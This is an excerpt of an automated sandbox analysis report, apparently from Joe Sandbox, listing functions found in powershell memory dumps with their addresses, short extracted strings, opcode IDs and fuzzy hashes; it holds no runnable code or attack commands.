                                    • Instruction ID: e7188acafcbc15a23767e2db9b15f000797bbf664aae95fa7127660578d7e9e4
                                    • Opcode Fuzzy Hash: d585f6b507fc6048f5440ee45e9cacf51a8cc3e7144133399a037b64000642f8
                                    • Instruction Fuzzy Hash: 84B13872B1EA8D5FEBA5DB6C58695B87BD1EF55210B0901FBD04DCB1E3DA18AC01C341
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00007FFD9B89C6B0 Relevance: .2, Instructions: 220COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4225696860.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_7ffd9b890000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8e2feefa433be83ac745fe204d2618b83402dc3636aa489ec70d3cfd8eeaf0a6
                                    • Instruction ID: 62ff3070b6956f388f7f501b7c9d9be94aaaf7d3eaef2ecbf0b84bf17cdbe3cc
                                    • Opcode Fuzzy Hash: 8e2feefa433be83ac745fe204d2618b83402dc3636aa489ec70d3cfd8eeaf0a6
                                    • Instruction Fuzzy Hash: 71616B7061CA498FDB59EF18C494AB5BBE1FF99310F1005BDD08AC71A7DA26F842CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00007FFD9B964307 Relevance: .2, Instructions: 156COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4227052908.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_7ffd9b960000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7578f637e974b867173249355f42d1593fa667d61107c43162da24105cb900a9
                                    • Instruction ID: 60216c55d980f278292af14a9212ef12b6aeed0aea94f2213d2f4c88d37ebd13
                                    • Opcode Fuzzy Hash: 7578f637e974b867173249355f42d1593fa667d61107c43162da24105cb900a9
                                    • Instruction Fuzzy Hash: 71510622F2FACA9FE7A5D7984871BB867D1EF51350B5900BED05CC72E3DE18A8008301
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00007FFD9B965472 Relevance: .1, Instructions: 112COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4227052908.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_7ffd9b960000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f9347930fcdfb5389ed883a12486ca09201fc3d52e4d11deb9615aabaaa24135
                                    • Instruction ID: 338cf128104409baa6966b3c52a080503a60b21a82eb3e13c87b03b238a8a7c8
                                    • Opcode Fuzzy Hash: f9347930fcdfb5389ed883a12486ca09201fc3d52e4d11deb9615aabaaa24135
                                    • Instruction Fuzzy Hash: 92312862F2FACE5FF7B59698187A1B867C1EF50620B5901FAD45DCB1E3ED086D008342
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00007FFD9B893945 Relevance: .0, Instructions: 49COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4225696860.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_7ffd9b890000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                    • Instruction ID: b79a6eb36e4b3c93bec01bee87a2e2d7b1e4b7860e7d9f7ae7ca8dfb3c7490a4
                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                    • Instruction Fuzzy Hash: E701677121CB0D4FDB48EF0CE451AA5B7E0FB99364F10056DE58AC36A5D636E881CB45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Executed Functions

                                    Function 04B2F250 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4087204267.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_4b20000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: \Vnj
                                    • API String ID: 0-2662855531
                                    • Opcode ID: f820ef3ae5916ed7f1baf26000ffb0583ae39313e3647dd791099f835fcc04dc
                                    • Instruction ID: 95e4641c6707bfbd7824be9239dba55c9f4d2b8cb614c3d23b7d5a88ea2d8391
                                    • Opcode Fuzzy Hash: f820ef3ae5916ed7f1baf26000ffb0583ae39313e3647dd791099f835fcc04dc
                                    • Instruction Fuzzy Hash: 78B17F70E00219CFDF14CFA9DA817AEBBF2FF88314F148169D419A7254EB74A845DB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 04B2FB20 Relevance: .3, Instructions: 266COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4087204267.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_4b20000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 307c970e578a3d459e3fede8f88fdcbb69d38def8e98ea69e2d20ae424a862d5
                                    • Instruction ID: 6769b530232098921fbaf24a218f1f8230a4ab11cddfe47da32563033be986c6
                                    • Opcode Fuzzy Hash: 307c970e578a3d459e3fede8f88fdcbb69d38def8e98ea69e2d20ae424a862d5
                                    • Instruction Fuzzy Hash: 69B1AF70E00219CFDF14CFA9DA917ADBBF2EF88314F148569D809E7254EB34A845DB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 079AB1B5 Relevance: 15.7, Strings: 12, Instructions: 704COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                    • API String ID: 0-242022331
                                    • Opcode ID: afcccb5e0e65dfbca538aee28a033cfdc5b1c3daa363b9341dd3286c719c7843
                                    • Instruction ID: 183b4e926b71a5379eec4039b007c679a2227e65bfee1bca6bf2bdfe3344dcee
                                    • Opcode Fuzzy Hash: afcccb5e0e65dfbca538aee28a033cfdc5b1c3daa363b9341dd3286c719c7843
                                    • Instruction Fuzzy Hash: 65627EB4A41218DFCB24DB18C950BDEBBB2FB89304F1084E5D9096F755CB71AE868F91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 079A2870 Relevance: 15.4, Strings: 12, Instructions: 450COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                    • API String ID: 0-879563280
                                    • Opcode ID: dcd88f4f3c8f0a4975b8159649479617253694963602c4d16ac3dae8a2b73fd3
                                    • Instruction ID: ea08eebde6afc8d9225c3cbaf7c849239874a00794ea2ebc60d92a30647bb526
                                    • Opcode Fuzzy Hash: dcd88f4f3c8f0a4975b8159649479617253694963602c4d16ac3dae8a2b73fd3
                                    • Instruction Fuzzy Hash: E4E13B71B06346AFCB259F29C91466ABBB6BFC5314F1488ABD405CF292DB32C885C7D1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 079AE0E0 Relevance: 13.0, Strings: 10, Instructions: 521COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q
                                    • API String ID: 0-1065491568
                                    • Opcode ID: 513a0ccbc0cf0e43879742372f3183feb3d54d410d9e115b302d4563a7c3dab3
                                    • Instruction ID: 4964af13914000c71d7b30ee89774a8dac0e1a98ae87fccaa8595db69af9860d
                                    • Opcode Fuzzy Hash: 513a0ccbc0cf0e43879742372f3183feb3d54d410d9e115b302d4563a7c3dab3
                                    • Instruction Fuzzy Hash: 2A12E8B1B01205EFCB24CB68C541AAABBF6AFC5318F14886AD8059F355DB72DC45CBE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 04B2B760 Relevance: 11.8, Strings: 9, Instructions: 518COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4087204267.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_4b20000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 8Nnj$Hbq$U$h]nj$h]nj$h]nj$$^q$$^q$Inj
                                    • API String ID: 0-2663944194
                                    • Opcode ID: d5f35ac05daed1d5da6e93d3dee7076e75ec1ec6e572556a50b8760e16a0943a
                                    • Instruction ID: 847829af573206650e54ceed1231ac99887075ab788144e32310c84bd1c3cc7c
                                    • Opcode Fuzzy Hash: d5f35ac05daed1d5da6e93d3dee7076e75ec1ec6e572556a50b8760e16a0943a
                                    • Instruction Fuzzy Hash: 10224E34B002248FDB25DF65D958AAEBBB2BF89304F1484E9D409AB361DF35AD45CF81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 079A5D51 Relevance: 8.2, Strings: 6, Instructions: 683COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                    • API String ID: 0-2822668367
                                    • Opcode ID: 2862a17e83bf6605a9c07cc8fcc8facb46f735480f8b8e0dc68b85972790e1ad
                                    • Instruction ID: 971176c12ee1f3ec46effbbd912fc07915ac68858e83325b9b662be5b4f2be36
                                    • Opcode Fuzzy Hash: 2862a17e83bf6605a9c07cc8fcc8facb46f735480f8b8e0dc68b85972790e1ad
                                    • Instruction Fuzzy Hash: DA42E5B0B01215EFCB24DB58C950B9ABBB6FF85304F1488A9D415AB755CB32EC86CBD1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 079A7381 Relevance: 7.8, Strings: 6, Instructions: 289COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                    • API String ID: 0-2822668367
                                    • Opcode ID: 6131d4598cb83db376568264b03cafaf93d1ae98c7b3f28c227df4cf517ab6da
                                    • Instruction ID: af3e430dd66dd589589e2b2ebb686557f431430afc89fc38e91b5c6ca9e8204e
                                    • Opcode Fuzzy Hash: 6131d4598cb83db376568264b03cafaf93d1ae98c7b3f28c227df4cf517ab6da
                                    • Instruction Fuzzy Hash: 14B1B4B0A01205DFDB24DBA8CA51B9EBBA7ABC4344F20C825D5016F795CF75DC4A8BD2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 079A72C2 Relevance: 4.0, Strings: 3, Instructions: 281COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q$4'^q
                                    • API String ID: 0-1196845430
                                    • Opcode ID: bf409e1e0204e96a197957533de612e8b0708f3a94ceec37ac90f158b6772246
                                    • Instruction ID: 8b2bfb7956b0a34f19b3b8fcf64635058e9de91a415ac1995cf574a7e7fd9792
                                    • Opcode Fuzzy Hash: bf409e1e0204e96a197957533de612e8b0708f3a94ceec37ac90f158b6772246
                                    • Instruction Fuzzy Hash: 1FB1CFB4A01205AFCB14CF98C941B9ABBB2FF84308F15C859D9116F795CB75E886CBD2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 079A0703 Relevance: 3.9, Strings: 3, Instructions: 120COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q$$^q
                                    • API String ID: 0-953868773
                                    • Opcode ID: f228cf1b4885ea8ebe90f37694917771e6efffb1b42954f7448dea07c1a71b68
                                    • Instruction ID: 10adce0a7690bd6b46bc5525640f028400ad10923ec4a7631c597f083e793a32
                                    • Opcode Fuzzy Hash: f228cf1b4885ea8ebe90f37694917771e6efffb1b42954f7448dea07c1a71b68
                                    • Instruction Fuzzy Hash: 7F3159B2B01125ABDB245AAC9D1167AB79AEFC1358F10887BD9018F305EE73C84AC7D5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 079A4728 Relevance: 3.4, Strings: 2, Instructions: 929COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: tP^q$tP^q
                                    • API String ID: 0-309238000
                                    • Opcode ID: e2ff38a3e9da93f88dac4bfce30a585d29424b6edbab582da80c69359a79a675
                                    • Instruction ID: d203da641cf83eb72f459fb0faa4ba0e5776c65a264bb1e8648c0875155ba181
                                    • Opcode Fuzzy Hash: e2ff38a3e9da93f88dac4bfce30a585d29424b6edbab582da80c69359a79a675
                                    • Instruction Fuzzy Hash: B18291B4B01205EFCB24DB98C540A5DBBB6AF85308F15C869D9059F369CB72EC4ACBD1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 079AC5E9 Relevance: 2.9, Strings: 2, Instructions: 397COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q
                                    • API String ID: 0-2697143702
                                    • Opcode ID: 21d47c6355d5ccfa6de1a82097386ac4d93f36af31804e56bd1d96588938b664
                                    • Instruction ID: 36091c4bc8365bd9b55f9333d45002889d066e73320e5a85640e7ea624eeb185
                                    • Opcode Fuzzy Hash: 21d47c6355d5ccfa6de1a82097386ac4d93f36af31804e56bd1d96588938b664
                                    • Instruction Fuzzy Hash: C6027FB4A40219DFDB24DB14C940BDDBBB2BB8A304F1084E5DA19AF751CB71AE85CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 079A624B Relevance: 2.9, Strings: 2, Instructions: 387COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q
                                    • API String ID: 0-2697143702
                                    • Opcode ID: ae9a1bc0b3a287b5232217a90839595bdf69c305e0b313a06bedcb2ba63d1b0e
                                    • Instruction ID: e71825ae16f70199cbc45cddffc67d59ba3750d5ff267076cc3407d2b2d2747e
                                    • Opcode Fuzzy Hash: ae9a1bc0b3a287b5232217a90839595bdf69c305e0b313a06bedcb2ba63d1b0e
                                    • Instruction Fuzzy Hash: 7DF1F5B0A002199FDB24DB24CD10F9EBBB7AF85304F14C8A5D509AF795CB71ED868B91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 079AB8D8 Relevance: 2.9, Strings: 2, Instructions: 363COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q
                                    • API String ID: 0-2697143702
                                    • Opcode ID: 29d6435bf181c3c1c02036757d5dde2f5cfc63bc29d608609ace93717891e026
                                    • Instruction ID: 931e4f12b704e0be534a9bbaa67cf80a3d5aae3d3af56732a0a9bfd865dca9c8
                                    • Opcode Fuzzy Hash: 29d6435bf181c3c1c02036757d5dde2f5cfc63bc29d608609ace93717891e026
                                    • Instruction Fuzzy Hash: F8E1C4B0A012189FC724DB18CD54FDEBBB2AF85304F1084A5DA19AF795CB71ED868F91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 04B2C418 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4087204267.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_4b20000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: h]nj$Inj
                                    • API String ID: 0-2429413462
                                    • Opcode ID: 75a40ede44100750a5d40f5b9e6f94c0e962ffb219f13b85c9c6392aaca736bb
                                    • Instruction ID: 7f819d69abbf5d86ec59ca86be53383b0d6f2f580ff49ed6536e293961e98d0e
                                    • Opcode Fuzzy Hash: 75a40ede44100750a5d40f5b9e6f94c0e962ffb219f13b85c9c6392aaca736bb
                                    • Instruction Fuzzy Hash: 1E313C34A042288FCF25DB64C954AEEB7B2BF49304F1044E9D509AB351CF75AE85CF81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 079A0767 Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$$^q
                                    • API String ID: 0-432994343
                                    • Opcode ID: 61f7eaf0f003f6fae6d9be884be8c86326e80bdcb0eac70393c7598f9adb73c2
                                    • Instruction ID: 61c843e490fa154c18964f8ae369193f70daedf9a0b1ff24d1c25d21cb7e7a16
                                    • Opcode Fuzzy Hash: 61f7eaf0f003f6fae6d9be884be8c86326e80bdcb0eac70393c7598f9adb73c2
                                    • Instruction Fuzzy Hash: 7F01D6F2E07252FBDB304A5C4950674B7A8EF4225CF0948AAD8514B341F7768885CBD6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 04B2F244 Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4087204267.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_4b20000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: \Vnj
                                    • API String ID: 0-2662855531
                                    • Opcode ID: 24ca884108f4ecbe489e94a0da550aa211fa2f133943f1f3ea25370e15353a8b
                                    • Instruction ID: 74dbddcd994a393c111ebbbe8d7a7d032fcd4a840d37d4a98b3111d1899cc8d9
                                    • Opcode Fuzzy Hash: 24ca884108f4ecbe489e94a0da550aa211fa2f133943f1f3ea25370e15353a8b
                                    • Instruction Fuzzy Hash: A0B17F70E00619CFDF10CFA8CA857AEBBF1FF88314F148169E419A7254EB74A845DB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 079A2F5C Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: tP^q
                                    • API String ID: 0-2862610199
                                    • Opcode ID: b42d238014c84c9fbd28c926857bf53d4879603c64fec7dab6675bdc128542dd
                                    • Instruction ID: e9d765e0e22632e04b27dbd0dc5fabdc62c4804a87b9fd1dcc340fe676714996
                                    • Opcode Fuzzy Hash: b42d238014c84c9fbd28c926857bf53d4879603c64fec7dab6675bdc128542dd
                                    • Instruction Fuzzy Hash: EA51C57060A396AFC312CB68C855A56BFB1AF86214F19C4DBE4448F2A3C775DC86C7E1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 079AE0C0 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q
                                    • API String ID: 0-1614139903
                                    • Opcode ID: 9732aa46fd675dd9b4f6027a2624210ce0ad9f0a425e65dded3c145463cea55f
                                    • Instruction ID: aa11c959acd6aaee17714b607af4cc0fa00b0ea10de395dc3cea9d90139146ca
                                    • Opcode Fuzzy Hash: 9732aa46fd675dd9b4f6027a2624210ce0ad9f0a425e65dded3c145463cea55f
                                    • Instruction Fuzzy Hash: 173179F0B02312AFC7208A6449427BD7FA69F82248F1804AADC00DB391D775E945C7E1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 079A50DD Relevance: .5, Instructions: 483COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 45705fc5729344ca8e9b2cdc3863d97629b6fadfe6df0d814f5b2e4fda8c6764
                                    • Instruction ID: 272e8063fd655631eee755cfa984aaa90925cb2d70ab4569bf0c3c298f2971b9
                                    • Opcode Fuzzy Hash: 45705fc5729344ca8e9b2cdc3863d97629b6fadfe6df0d814f5b2e4fda8c6764
                                    • Instruction Fuzzy Hash: AA126DB4B01205EFCB20CB98C541E59BBB6FB85308F15C869D9159F369C7B2EC4ACB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 04B23670 Relevance: .3, Instructions: 313COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4087204267.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_4b20000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d5d80756ba761378705161e924c221e18a6673364c2ef129658958bbf0823f3e
                                    • Instruction ID: 7db4c720663d316db6abf67999f515e31ddf16b27745e8408d2626fdeb85d278
                                    • Opcode Fuzzy Hash: d5d80756ba761378705161e924c221e18a6673364c2ef129658958bbf0823f3e
                                    • Instruction Fuzzy Hash: FED11774A012199FCB05CFA8D584A9DFBF2FF89310F258199E809AB365C735ED85CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 04B28D38 Relevance: .3, Instructions: 266COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4087204267.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_4b20000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 16c325d479da1b4390d967bf9b6f8674bda68f53c0a864fb132d15c1b0cc4dda
                                    • Instruction ID: 430361e4cd6bc222496919c4cd6b0ff1f821758d00c3f6dd8b507de82a84bd46
                                    • Opcode Fuzzy Hash: 16c325d479da1b4390d967bf9b6f8674bda68f53c0a864fb132d15c1b0cc4dda
                                    • Instruction Fuzzy Hash: ABA18075B002189FDB14DFA5CA48A9DBBF2FF85315F118558E40AAF364DB34AD49CB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 04B2FB15 Relevance: .3, Instructions: 265COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4087204267.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_4b20000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 785e70ad2d17518a20756ffac2aa1c0aa12da1a5eceeccde65c4f985a9da6e44
                                    • Instruction ID: 77fa047fa53152f9792e73d6c00c5ca0c9ade7f9c6336878603cdde0961c0ab9
                                    • Opcode Fuzzy Hash: 785e70ad2d17518a20756ffac2aa1c0aa12da1a5eceeccde65c4f985a9da6e44
                                    • Instruction Fuzzy Hash: 9DB18E70E00229CFDF10CFA8DA957EDBBF1EF88354F148569D808A7254EB34A845DB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 079A5490 Relevance: .2, Instructions: 247COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6dc605b564db65cf7295b0b68095bd12af469b19768785b1dd7185e6bea0719d
                                    • Instruction ID: 144490ae16f420e5f2850058d77ea402347dbbfe24ec3989c79c489f4ed8faf7
                                    • Opcode Fuzzy Hash: 6dc605b564db65cf7295b0b68095bd12af469b19768785b1dd7185e6bea0719d
                                    • Instruction Fuzzy Hash: 6F91A1B4B41204EFD714DB58CA44BAE7BA7AB84304F258464E510AF795CB72EC46CBE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 04B28528 Relevance: .2, Instructions: 234COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4087204267.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_4b20000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7aeaa869660210a016edcb8472dd6edea20f0f264a76fc60dde6ee55c5fa4cce
                                    • Instruction ID: 3acb5c0983daba1d3df04721afd21536c86dd01796a08329c26ecdbe319d965b
                                    • Opcode Fuzzy Hash: 7aeaa869660210a016edcb8472dd6edea20f0f264a76fc60dde6ee55c5fa4cce
                                    • Instruction Fuzzy Hash: 75911534A003149FCB15EF68D544AADBBF2FF89350F188AA9E4559B361CB35EC86CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

